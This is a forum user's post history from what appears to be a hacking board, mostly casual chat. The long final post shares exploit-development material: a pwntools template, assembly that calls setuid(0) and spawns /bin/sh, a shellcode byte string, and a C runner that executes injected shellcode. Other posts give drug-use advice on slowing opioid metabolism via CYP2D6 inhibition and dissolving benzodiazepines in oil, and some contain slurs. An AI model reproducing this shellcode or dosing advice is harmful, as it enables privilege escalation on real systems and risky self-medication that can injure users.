User Controls
Posts by Sophie
-
2021-01-12 at 2:04 PM UTC in My latest bookIf you wrote a book on philosophy, or a philosophical treatise. I'd actually read it, Lan Man Fam.
-
2021-01-12 at 1:47 PM UTC in Coding is hard to concentrate on.
Originally posted by tee hee hee Its a job for mennerds
It's a category of careers reserved for higher IQ people. Whether you use your skills within or outside of the law. It requires at the very least solid problem solving skills, and it pays well, whether you are self-employed or work for a small or big company.
What line of work are you in? -
2021-01-12 at 1:26 PM UTC in Parler shitcanned off AWS
-
2021-01-12 at 10:29 AM UTC in Parler shitcanned off AWS
Originally posted by aldra yeah they try to obfuscate it with wanky fucking language but that's about it
Security through obscurity. Always thought it was a shitty doctrine, i know i don't have to tell you this but for anyone else, it's something you should only do after you properly secure your assets the regular way. And even then a persistent adversary will make short work of it. Some people insist on running their SSH on a weird port like 7300, but if i am port scanning a server, i am scanning all ports in general, not just key ones like 21,22,23,80,443 and so on. If i want to save time i'll spin off multiple threads.
That's just an example but security through obscurity has dubious utility at best. -
2021-01-12 at 10:12 AM UTC in Parler shitcanned off AWS
-
2021-01-12 at 9:46 AM UTC in A cute video I foundNot the kind of 'cute' i'm into unfortunately.
-
2021-01-12 at 9:45 AM UTC in DIY Extended Release
-
2021-01-11 at 6:38 PM UTC in DIY Extended Release
Originally posted by aldra not a benzo, opioid RC that hits selective receptors (AP237)
works by inhibiting certain liver enzymes and I'm not sure which ones break this down
I can probably find some of that, won't it give me heartburn or some shit if I use it when I don't need it though?
Omeprazole and pantoprazole? Not at all. And generally for opiates, the enzyme inhibition route works best. Unless the opioid in question has a very peculiar molecular structure,CYP2D6(the enzyme grapefruit juice and the 'prazoles' inhibit) will be the enzyme responsible for breaking it down. If it's a pro-drug like codeine, it will inhibit conversion to the psycho-active metabolite as well, so you might want to take that into account. I am pretty certain CYP2D6 will do the job just fine though since it's the main enzyme your body uses in hydroxylation, demethylation, and dealkylation. Which covers a whole slew of not just opioids but psychotropics in general, due to the way a lot of classes of them are built molecularly. -
2021-01-11 at 6:18 PM UTC in Share 1337 cool wack gangster swag yolo shitI will say that Chrome S&W 1911 Model is a pretty sexy piece of hardware.
-
2021-01-11 at 6:15 PM UTC in Coding is hard to concentrate on.
-
2021-01-11 at 6:10 PM UTC in Low level development and security thread.
Originally posted by SBTlauien I'm more interested in Linux/Android exploits. Windows isn't really my thing, even when attacking. I know it's more profitable for both black and white hat, but I just don't want to have to learn about a OS that I don't use.
That's fair enough. The OP is Linux focused. I've set some time aside tomorrow to work on a Linux project related to the subject this thread is about. If i come across anything interesting, i might just post about that as well. -
2021-01-11 at 6:07 PM UTC in Decentralization, P2P, Federation, Blockchain and other stuffInterestingly enough you point about CP, Kev, is actually valid. If terrorists and pedos aren't using your secure anonymous network. It's not secure or anonymous enough. Not sure if you're familiar but i think The Gruqg who is an OPSEC Guru made basically the same argument a while ago in an article i read.
-
2021-01-11 at 5:59 PM UTC in Networking/Router Help
Originally posted by aldra oh
in that case you want it to act as a wireless bridge/relay and it doesn't appear there's anything in the options to support that
https://www.downloads.netgear.com/files/GDC/R6230/R6230_UM_EN.pdf
Yee, i was about to suggest setting the router to bridge mode. -
2021-01-11 at 5:34 PM UTC in Coding is hard to concentrate on.
Originally posted by SBTlauien Very true. Maybe try writing a small script for your OS.
I've always like the challenge of it. It's like those formulas in algebra that once I got down, I loved solving.
Yeah and even if it's not something like algebra. it's best to do a project that challenges you in a fun and stimulating manner. Something just above your skill level that you get to solve. Don't start an extremely complex project that will just frustrate you until you give up. Learn gradually, keep the challenge hard but doable and you will enjoy the creative and problem solving process. -
2021-01-11 at 5:13 PM UTC in Low level development and security thread.
Originally posted by mashlehash yo
Yo, Mash, like what you're seeing in this thread? How's learning Python going for you?
Originally posted by SBTlauien If I had more time on my hands, this is the direction I'd be going in. I did get a light to blink and had some buttons that made it blink…
I would definitely recommend getting into exploit development and general low level security research, like stuff focused on firmware and the kernel. It will be very useful for MalDev as well. Think rootkits and bootkits.
If anyone is interested i will make a post ITT thread about some techniques you can employ for exploits and shellcode that argets Windows. More specifically, generating shellcode for an exploit or shell and obfuscating by converting to ANCII and delivering/deploying your payload in that manner. I wrote some Bash to convert shellcode to ANCII and inject it into a template ready for compilation.
It's pretty neat.
Honestly i wish more people would be interested in low level security, i am part of multiple security oriented communities, but even among skilled security practitioners there don't seem to be that many people really into this kind of stuff. And if they are they're either highly skilled cybermancers that have better things to do than discuss this sort of stuff, or they're not particularly proficient. Not judging either, this is some pretty abstract stuff and i am very much still learning myself. Ah well, no excuse to be bored, personally. I try my best to put in the work to achieve my long term goals. -
2021-01-08 at 11:47 PM UTC in The media do nothing but spread fearThe hacker known as 4chan is a talentless bitch.
-
2021-01-08 at 11:45 PM UTC in DIY Extended Release
-
2021-01-08 at 11:43 PM UTC in DIY Extended ReleaseIs it a Benzo? It is my understanding that benzos are somewhat lipophilic which means they dissolve faster in lipids(fats) than in water. You could take some olive oil, break your benzo into pieces that will fit in a capsule, and combine them. So you have a capsule of olive oil with your benzo in it that you can take. It should slow down the rate of absorption. Kind of like how eating a stick of butter before you down a bunch of vodka will make it so you get drunk more gradually.
-
2021-01-08 at 4:10 PM UTC in How does 2-3k people just walk into the capital building?What happened, happened because it wasn't stopped by design. They could have easily prevented it, however they let it happen because it would be the final nail. With optics like what happened, support for Mr MAGA and the MAGA cause dropped significantly.
-
2021-01-08 at 2:59 PM UTC in Low level development and security thread.Sup niggas, i was wondering if those of you who are so inclined would be willing to share any of the utilities, resources and/or tools you like to use when working with/on automating certain aspects of low level security. Yes i already have a debugger, multiple in fact(Including Radare2, looking at you Bueno). I also have an assembler, linker, compiler and a tool for static code analysis. But that's not really the type of tool i'm looking for or talking about.
I'm not sure if you're familiar but there's a Python tool/library that's useful in terms of exploit and payload development called pwntools. If you're interested just install it with `pip3 install pwntools`. Besides providing tools that'll let you patch ELF files from the CLI and having a built in disassembler among other things, when imported as a lib it allows you to do cool stuff like:
from pwn import *
# Set up pwntools for the correct architecture
context.update(arch='i386')
exe = './path/to/binary'
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
# Exploit goes here
io = start()
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
io.interactive()
This is the kind of tool i'm talking about. And since i don't just want to come here hat in hand i will share some of the stuff i like to use as well. Like ROPGadget.py which lets you search for gadgets in a binary. It supports several file formats and architectures and is pretty useful for ROPChaining.
git clone https://github.com/JonathanSalwan/ROPgadget.git
I also recently came across a tool called Shellnoob, which despite it's name is pretty 1337. Besides that though it's mostly very convenient because among other things it can convert between the following file types:
Supported input: asm, obj, bin, hex, c, shellstorm
Supported output: asm, obj, exe, bin, hex, c, completec, python, bash, ruby, pretty, safeasm
It can also NOP out fork() calls and patch executables has interactive ASM to opcode mode, resolves syscall numbers and supports both ATT and Intel syntax. Not to mention it was accepted for Blackhat Arsenal, which gives it some serious street cred if you ask me.
git clone https://github.com/reyammer/shellnoob.git
Personally i like to keep a little cheatsheet handy in order to remember some useful Linux utilities related to what we are talking about.
# Dump hex first 128 bytes
xxd -l 128 <filename>
# Dump binary first 128 bytes
xxd -b -l 128 <filename>
# Dump c-style header first 128 bytes at a 256-bytes offset
xxd -i -s 256 -l 128 <filename>
# Check relocations inside the object file
readelf --relocs <filename>.o
# Dump all headers
readelf --headers <filename>
# Dump everything
readelf --all <filename>
# List symbols from object file
nm <filename>
# List and demangle dynamic symbols from stripped object file
nm -D --demangle <filename>
# Get preprocessing output
gcc -E -P <source_file>.c > <preprocessing_output>.i
# Add current path to the linker environment
linker=$(export LD_LIBRARY_PATH=`pwd`)
# Trace SysCalls
strace <filename> `ltrace -i -C <filename>`
# Simple disassembly of an object file
objdump -M intel -d <filename>.o
# Extract shellcode from .sc or .o/.obj file
objdump -d $filename | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: |cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
If you got anything to add to the cheatsheet, please do. That last one is particularly useful. If you take the below Assembly(ATT).
global _start
section .text
_start:
; setuid(0)
xor edi,edi
push rdi ; null terminator for the following string
push 105
pop rax
; push /bin//sh in reverse
mov rbx,0xd0e65e5edcd2c45e
syscall
; execve
ror rbx,1
mov al,59
push rbx
xchg esi,edi
push rsp
cdq
; store /bin//sh address in RDI, points at string
pop rdi
; Call the Execve syscall
syscall
Compile it with NASM like so:
nasm -felf64 XorSh.nasm -o XorSh.o && ld XorSh.o -o XorSh
You can now either run the compiled ELF binary `./XorSh` or extract shellcode from the object file and use it to inject it with Python, or use it as payload in a C program. If you extract the shellcode you can use the below C program to test it.
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/mman.h>
/* should be enough to hold your shellcode, if not just set this to a higher value */
#define BUFSIZE 4096
/* set to 1 to enable debugging, will break before executing the shellcode */
#define DEBUGGING 0
/* either paste your shellcode in here ... */
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char* argv[])
{
size_t len;
char *buf, *ptr;
printf("[*] Allocating executable memory...\n");
buf = mmap(NULL, BUFSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
ptr = buf;
printf("[+] Buffer @ %p\n", buf);
#if DEBUGGING
ptr[0] = '\xcc';
ptr++;
#endif
/* ... or pass it as filename to the program */
if (argc > 1) {
printf("[*] Reading shellcode from file...\n");
FILE *f = fopen(argv[1], "r");
if (!f) {
fprintf(stderr, "[-] Cannot open %s: %s\n", argv[1], strerror(errno));
exit(-1);
}
len = fread(ptr, 1, BUFSIZE, f);
fclose(f);
} else {
len = sizeof(shellcode);
printf("[*] Copying shellcode...\n");
memcpy(ptr, shellcode, len);
}
printf("[+] Done, size of shellcode: %i bytes\n", len);
printf("[*] Jumping into shellcode...\n\n");
(*(void (*)()) buf)();
return 0;
}
It would also be pretty easy to adjust the above program to just run the shellcode, but you might as well just run the ELF binary i guess. Anyway, if you have anything to add provided it's along the lines of what i posted please do so.
If you have something really special, like a tool you coded yourself that's particularly useful with regards to this stuff. I may trade you something special in return. I have a closed source Windows tool, complete with GUI that automates finding ROPGadgets and making ROPChains, it's not for sale anywhere, and only a few people have this tool. It's excellent for exploit development targeting Windows. I will send you the source files for this tool if you have something special to trade for it.
